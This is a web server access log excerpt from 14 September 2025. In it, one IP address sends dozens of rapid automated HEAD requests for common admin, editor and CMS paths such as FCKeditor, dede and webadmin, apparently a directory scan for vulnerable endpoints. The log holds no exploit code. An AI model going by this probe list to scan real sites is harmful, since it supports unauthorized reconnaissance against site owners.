49.51.243.95 - - [14/Sep/2025:09:10:06 +0800] "GET /wp-content/uploads/2025/07/1753456770- HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
47.109.54.65 - - [14/Sep/2025:09:10:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.54.65 - - [14/Sep/2025:09:10:10 +0800] "GET / HTTP/1.1" 200 39369 "http://www.cqqizhou.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.54.65 - - [14/Sep/2025:09:10:11 +0800] "HEAD /wp-includes HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:12 +0800] "HEAD /wp-includes/ HTTP/1.1" 403 0 "http://www.cqqizhou.com/wp-includes" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:13 +0800] "HEAD /FCKeditor/editor HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:13 +0800] "HEAD /hello HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /fckeditor HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /server HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /login HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /guestbook HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /adminx HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /2012 HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /data HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /edit HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /southidceditor HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /editor HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /Systemadmin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /admin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /sadmin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /manage HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /office HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /backgl HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /dede HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /newbbs HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /manage HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /database HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /webadmin HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:14 +0800] "HEAD /test HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:15 +0800] "HEAD /Fckeditor HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:15 +0800] "HEAD /web HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:15 +0800] "HEAD /include HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:15 +0800] "HEAD /add HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:15 +0800] "HEAD /bbs HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:15 +0800] "HEAD /Photo HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
47.109.54.65 - - [14/Sep/2025:09:10:15 +0800] "HEAD /Editor/Include HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
